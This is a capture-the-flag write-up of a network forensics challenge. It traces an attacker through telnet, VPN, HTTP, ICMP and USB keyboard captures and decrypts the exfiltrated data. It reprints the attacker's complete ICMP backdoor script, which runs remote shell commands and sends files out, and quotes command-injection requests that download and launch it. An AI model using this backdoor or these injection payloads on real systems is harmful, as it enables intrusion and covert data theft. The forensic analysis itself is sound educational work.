

A quick write-up of the SHA2017 CTF Network 300 (“Abuse Mail”) challenge. I participated with our newly formed team “Hackbuts”.

To solve this challenge you only get a 590KB abusemail.tgz file and this short description:

“Our abuse desk received an mail that someone from our network has hacked their company. With their help we found some suspected traffic in our network logs, but we can’t find what exactly has happened. Can you help us to catch the culprit?”

After unpacking we find three pcap files: abuse01.pcap, abuse02.pcap and abuse03.pcap.











After loading abuse01.pcap into Wireshark we immediately notice a telnet session. Following the TCP stream we see someone logging into a VPN router and running “ip xfrm state”, which lists the IPsec security associations including their keys:



The remaining packets are encrypted VPN traffic. Using the information from the telnet session we can set up decryption in Wireshark like this:

In the now-decrypted packets we see a port scan followed by an HTTP session. The attacker exploited a command injection vulnerability in a ping web service by sending requests like this: GET /?ip=google.com;ls

Further down in the HTTP stream he uploads a malicious Python script (“GET /?ip=%3Bwget%20http://10.5.5.207/backdoor.py%20-O%20/tmp/backdoor.py”) and kindly echoes it back (“GET /?ip=%3Bcat%20/tmp/backdoor.py”). This gives us the script:

    #!/usr/bin/env python

    import base64
    import sys
    import time
    import subprocess
    import threading

    from Crypto import Random
    from Crypto.Cipher import AES
    from scapy.all import *

    BS = 16
    pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    unpad = lambda s : s[0:-ord(s[-1])]
    magic = "SHA2017"

    class AESCipher:

        def __init__( self, key ):
            self.key = key

        def encrypt( self, raw ):
            raw = pad(raw)
            iv = Random.new().read( AES.block_size )
            cipher = AES.new( self.key, AES.MODE_CBC, iv )
            return base64.b64encode( iv + cipher.encrypt( raw ) )

        def decrypt( self, enc ):
            enc = base64.b64decode(enc)
            iv = enc[:16]
            cipher = AES.new(self.key, AES.MODE_CBC, iv )
            return unpad(cipher.decrypt( enc[16:] ))

    def run_command(cmd):
        ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
        output = ps.communicate()[0]
        return output

    def send_ping(host, magic, data):
        data = cipher.encrypt(data)
        load = "{}:{}".format(magic, data)
        time.sleep(1)
        sr(IP(dst=host)/ICMP()/load, timeout=1, verbose=0)

    def chunks(L, n):
        for i in xrange(0, len(L), n):
            yield L[i:i+n]

    def get_file(host, magic, fn):
        time.sleep(1)
        data = base64.urlsafe_b64encode(open(fn, "rb").read())
        cnt = 0
        icmp_threads = []
        for line in chunks(data, 500):
            t = threading.Thread(target = send_ping, args = (host,magic, "getfile:{}:{}".format(cnt,line)))
            t.daemon = True
            t.start()
            icmp_threads.append(t)
            cnt += 1

        for t in icmp_threads:
            t.join()

    cipher = AESCipher(sys.argv[1])

    while True:
        try:
            pkts = sniff(filter="icmp", timeout =5,count=1)

            for packet in pkts:
                if str(packet.getlayer(ICMP).type) == "8":
                    input = packet[IP].load
                    if input[0:len(magic)] == magic:
                        input = input.split(":")
                        data = cipher.decrypt(input[1]).split(":")
                        ip = packet[IP].src
                        if data[0] == "command":
                            output = run_command(data[1])
                            send_ping(ip, magic, "command:{}".format(output))
                        if data[0] == "getfile":
                            #print "[+] Sending file {}".format(data[1])
                            get_file(ip, magic, data[1])
        except:
            pass

And after that he executed the backdoor script:



GET /?ip=%3Bnohup%20sudo%20python%20/tmp/backdoor.py%20K8djhaIU8H2d1jNb%20\& HTTP/1.1
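The request is percent-encoded, so the key is easier to spot after decoding. A minimal Python 3 sketch, assuming the request line is copied verbatim from the HTTP stream; the helper names `injected_command` and `backdoor_key` are made up for illustration:

```python
from urllib.parse import unquote

# Request line as it appears in the decrypted HTTP stream.
REQUEST_LINE = r"GET /?ip=%3Bnohup%20sudo%20python%20/tmp/backdoor.py%20K8djhaIU8H2d1jNb%20\& HTTP/1.1"


def injected_command(request_line):
    """Return the URL-decoded value of the ip parameter."""
    target = request_line.split(" ")[1]        # the part between method and version
    return unquote(target.split("ip=", 1)[1])  # everything after "ip="


def backdoor_key(command, script="/tmp/backdoor.py"):
    """Return the first argument passed to the script, which backdoor.py uses as AES key."""
    tokens = command.split()
    return tokens[tokens.index(script) + 1]


command = injected_command(REQUEST_LINE)
key = backdoor_key(command)
print(command)
print(key, len(key))
```

The key is 16 characters long, which fits AES with a 128-bit key.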









Next, looking at the other two captures, we find only ICMP traffic in both. The data part of those packets is rather large, always starts with “SHA2017:”, and the rest looks like a base64-encoded string:

Reviewing the Python script, this makes sense. backdoor.py runs the commands it receives, AES-encrypts the output, base64-encodes it, and sends it via ICMP to a remote host. It can also transfer complete files.
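The layering of one payload can be sketched with the standard library alone. This is a Python 3 illustration of the framing used by backdoor.py, not a decryptor: the demo payload uses an all-zero IV and an unencrypted, padded stand-in where the real traffic carries AES-CBC ciphertext, and `split_payload` is a hypothetical helper name.

```python
import base64

MAGIC = b"SHA2017"
BLOCK = 16  # AES block size, called BS in backdoor.py


def pad(data):
    """Padding as in backdoor.py: append n bytes that each have the value n."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    """Inverse of pad: the last byte says how many bytes to drop."""
    return data[:-data[-1]]


def split_payload(load):
    """Split an ICMP payload into (iv, ciphertext); return None for other traffic."""
    if not load.startswith(MAGIC + b":"):
        return None
    raw = base64.b64decode(load[len(MAGIC) + 1:])
    return raw[:BLOCK], raw[BLOCK:]


# Stand-in payload: NOT encrypted, it only demonstrates the framing.
fake_iv = bytes(BLOCK)
fake_body = pad(b"command:id")
load = MAGIC + b":" + base64.b64encode(fake_iv + fake_body)

iv, body = split_payload(load)
print(len(iv), len(body), unpad(body))
```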



In Wireshark we apply the data section as a column and export the packets as JSON for both abuse02.pcap and abuse03.pcap. Then we extract only the data portion into new files:

    fgrep data.data abuse3.json | uniq | sed 's/^.*"data.data": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse3_data.txt
    fgrep data.data abuse2.json | uniq | sed 's/^.*"data.data": "//g' | sed 's/",.*//g' | sed 's/://g' > abuse2_data.txt
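The same extraction can be sketched in Python 3 by walking the parsed JSON instead of grepping it. The nesting in `SAMPLE` is an assumption made for illustration; the search is recursive precisely so that it does not depend on where Wireshark places the "data.data" key.

```python
import json


def find_values(node, key="data.data"):
    """Yield every value stored under `key`, at any nesting depth."""
    if isinstance(node, dict):
        for k, v in node.items():
            if k == key:
                yield v
            else:
                yield from find_values(v, key)
    elif isinstance(node, list):
        for item in node:
            yield from find_values(item, key)


def extract_payloads(json_text):
    """Return hex payloads without colons, collapsing consecutive duplicates like uniq."""
    payloads = []
    for value in find_values(json.loads(json_text)):
        value = value.replace(":", "")
        if not payloads or payloads[-1] != value:
            payloads.append(value)
    return payloads


# Hypothetical, heavily shortened export with one repeated payload.
SAMPLE = """[
  {"_source": {"layers": {"data": {"data.data": "53:48:41"}}}},
  {"_source": {"layers": {"data": {"data.data": "53:48:41"}}}},
  {"_source": {"layers": {"data": {"data.data": "32:30"}}}}
]"""

print(extract_payloads(SAMPLE))
```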

Next convert this data into ASCII and remove the “SHA2017:” prefix:

    while read line ; do echo "$line" | xxd -r -p | sed 's/^SHA2017://g' ; done < abuse2_data.txt > abuse2_ascii.txt
    while read line ; do echo "$line" | xxd -r -p | sed 's/^SHA2017://g' ; done < abuse3_data.txt > abuse3_ascii.txt
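For readers without xxd, the conversion is a one-liner per payload in Python 3. A small sketch, where `hex_to_b64` is a hypothetical helper name and the demo input is generated on the spot rather than taken from the captures:

```python
PREFIX = b"SHA2017:"


def hex_to_b64(hex_line):
    """Turn one hex-encoded payload into its base64 text, without the magic prefix."""
    raw = bytes.fromhex(hex_line.strip())
    if raw.startswith(PREFIX):
        raw = raw[len(PREFIX):]
    return raw.decode("ascii")


# Demo input: the hex form of "SHA2017:QUJD" (not real challenge data).
demo_hex = b"SHA2017:QUJD".hex()
print(demo_hex)
print(hex_to_b64(demo_hex))
```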

Those files now contain base64-encoded, AES-encrypted data. We wrote this simple decryption script based on the decrypt function of backdoor.py. The key was leaked in the first HTTP session, when the script was started:

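    # decrypt.py (Python 2): decrypt one base64 line passed as the first argument
    import base64
    import sys

    from Crypto.Cipher import AES

    enc = sys.argv[1]

    # strip the padding: the last byte holds the number of padding bytes
    unpad = lambda s : s[0:-ord(s[-1])]

    enc = base64.b64decode(enc)
    iv = enc[:16]  # the first 16 bytes are the IV, as in backdoor.py
    cipher = AES.new('K8djhaIU8H2d1jNb', AES.MODE_CBC, iv )
    print unpad(cipher.decrypt( enc[16:] ))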

With this script we can decrypt both files now:

    while read line ; do python decrypt.py "$line" ; done < abuse2_ascii.txt > abuse2_decrypted.txt
    while read line ; do python decrypt.py "$line" ; done < abuse3_ascii.txt > abuse3_decrypted.txt
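The loop above starts one Python process per line. As an alternative, here is a hedged Python 3 sketch that decrypts a whole file in one run. It assumes PyCryptodome is installed (it provides the `Crypto` package) and that the input holds one base64 string per line; the function names are made up for illustration.

```python
import base64
import sys

KEY = b"K8djhaIU8H2d1jNb"  # key leaked in the HTTP session


def unpad(data):
    """Drop the padding: the last byte holds the number of padding bytes."""
    return data[:-data[-1]]


def decrypt_line(line, key=KEY):
    """Decrypt one base64 line: the first 16 bytes are the IV, the rest is AES-CBC data."""
    # Imported lazily because PyCryptodome is a third-party dependency.
    from Crypto.Cipher import AES
    raw = base64.b64decode(line)
    iv, body = raw[:16], raw[16:]
    return unpad(AES.new(key, AES.MODE_CBC, iv=iv).decrypt(body))


def main(path):
    """Write the decrypted content of every non-empty line to stdout."""
    with open(path) as handle:
        for line in handle:
            line = line.strip()
            if line:
                sys.stdout.buffer.write(decrypt_line(line) + b"\n")


if __name__ == "__main__" and len(sys.argv) == 2:
    main(sys.argv[1])
```

Saved under a name of your choice, it would be called with the ASCII file as its only argument and its output redirected to the decrypted file.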









abuse2_decrypted.txt now contains the output of the Linux commands the attacker ran on the compromised “intranet” web server. He started some nmap scans and listed a few files, but he also used cat to dump the web server’s TLS keys and started two more tcpdump sessions:



The data in abuse3_decrypted.txt appears to come from the file transfer functionality of the backdoor script. It contains the two pcap files “intranet.pcap” and “usb.pcap”. We manually split the data so that the content of each pcap has its own file (“intranet_encoded.txt” and “usb_encoded.txt”). We also removed these “headers”:

getfile:/tmp/intranet.pcap

getfile:/tmp/usb.pcap

The files now have this format:

getfile:22:xMWknTPe(...)

getfile:3:8XB7Q94TD(...)

Reading the backdoor script, we see that the number after getfile is the sequence number in which the chunk was sent, but the chunks were not received in this order (each one is sent from its own thread). We also see that the complete file is read, then base64 encoded (URL-safe variant), and then exfiltrated via ICMP in chunks of 500 characters. This means we need to sort the lines and join them into one single line:

    sed 's/getfile://g' intranet_encoded.txt | sort -n | sed 's/^.*://g' | tr -d "\n\r" > intranet_one_line.txt
    sed 's/getfile://g' usb_encoded.txt | sort -n | sed 's/^.*://g' | tr -d "\n\r" > usb_one_line.txt

We created this simple script to decode the files:

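    # decode_file.py (Python 2): URL-safe base64 decode of the joined chunks
    import base64
    import sys

    file = sys.argv[1]

    # note: print appends one trailing newline to the decoded data
    print base64.urlsafe_b64decode(open(file, "rb").read())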

And decoded them:

    python decode_file.py intranet_one_line.txt > intranet.pcap
    python decode_file.py usb_one_line.txt > usb.pcap
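Sorting, joining and decoding can also be combined in one step. The following Python 3 sketch assumes input lines of the form getfile:<number>:<chunk>, as in the encoded files; `reassemble` is a hypothetical name, and the demo data is generated locally instead of coming from the capture.

```python
import base64


def reassemble(lines):
    """Rebuild the original file bytes from 'getfile:<seq>:<chunk>' lines in any order."""
    chunks = {}
    for line in lines:
        parts = line.strip().split(":", 2)
        # Skip anything else, e.g. the 'getfile:/tmp/usb.pcap' request headers.
        if len(parts) != 3 or parts[0] != "getfile" or not parts[1].isdigit():
            continue
        chunks[int(parts[1])] = parts[2]
    joined = "".join(chunks[seq] for seq in sorted(chunks))
    return base64.urlsafe_b64decode(joined)


# Demo: encode some bytes the way get_file() does, then shuffle the chunks.
original = bytes(range(256)) * 5
encoded = base64.urlsafe_b64encode(original).decode("ascii")
pieces = [encoded[i:i + 500] for i in range(0, len(encoded), 500)]
lines = ["getfile:/tmp/usb.pcap"]
lines += ["getfile:{}:{}".format(seq, pieces[seq]) for seq in (2, 0, 3, 1)]

restored = reassemble(lines)
print(len(pieces), restored == original)
```

Writing the result with `open(name, "wb")` keeps the output byte-exact, without the extra newline that `print` adds.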

Checking intranet.pcap we find an HTTPS session. We set up SSL decryption in Wireshark like this:





The key for this was obtained from the decrypted abuse02 data. In the now-decrypted session we can see that the attacker downloads “secret.zip” from the intranet server. With Wireshark we can extract that object from the stream:

But we cannot open it, because it is encrypted with a password.







Next we’ll look at the usb.pcap file. After a bit of research it is clear that the dump is from a USB keyboard. In Wireshark we apply the “leftover capture data” as a column and set a display filter to:

((frame.len == 72)) && !(usb.capdata == 00:00:00:00:00:00:00:00) && !(usb.capdata == 02:00:00:00:00:00:00:00)

With this and a HID usage table (http://www.usb.org/developers/hidpage/Hut1_12v2.pdf, page 53) we can look up the keystrokes:

If the data begins with “02”, the shift key is pressed as well; otherwise the character is lowercase. Going through the pcap we can see the attacker logging into the system, downloading secret.zip via curl and finally using unzip to extract it, with the password: “Pyj4m4P4rtY@2017”
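The manual lookup can be automated. Below is a Python 3 sketch that maps one 8-byte keyboard report to a character, assuming a US layout and the usual report format (byte 0 holds the modifiers, byte 2 the first key code). It only reads the first key slot, which is a simplification, and `decode_report` is a hypothetical name.

```python
# Usage IDs from the keyboard page of the HID usage tables (US layout assumed).
LETTERS = {0x04 + i: chr(ord("a") + i) for i in range(26)}
DIGITS = dict(zip(range(0x1E, 0x28), "1234567890"))
SHIFTED_DIGITS = dict(zip(range(0x1E, 0x28), "!@#$%^&*()"))
PUNCT = {0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"),
         0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
         0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?")}
SHIFT_MASK = 0x22  # left shift (0x02) or right shift (0x20)


def decode_report(capdata):
    """Translate one report such as '02:00:13:00:00:00:00:00' into a character."""
    report = bytes.fromhex(capdata.replace(":", ""))
    if len(report) != 8:
        return ""
    shift = bool(report[0] & SHIFT_MASK)
    code = report[2]  # first key slot only
    if code in LETTERS:
        return LETTERS[code].upper() if shift else LETTERS[code]
    if code in DIGITS:
        return SHIFTED_DIGITS[code] if shift else DIGITS[code]
    if code in PUNCT:
        return PUNCT[code][1 if shift else 0]
    if code == 0x28:  # Enter
        return "\n"
    return ""


# Hand-made reports for illustration, not copied from usb.pcap.
reports = ["02:00:13:00:00:00:00:00", "00:00:1c:00:00:00:00:00",
           "02:00:1f:00:00:00:00:00", "00:00:1f:00:00:00:00:00"]
typed = "".join(decode_report(r) for r in reports)
print(typed)
```

Feeding it the usb.capdata column exported from Wireshark, one report per line, should reproduce the typed commands, apart from special keys such as backspace that this sketch ignores.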





We use the same password to decrypt the secret.zip file and get a secret.txt file, which finally contains the flag: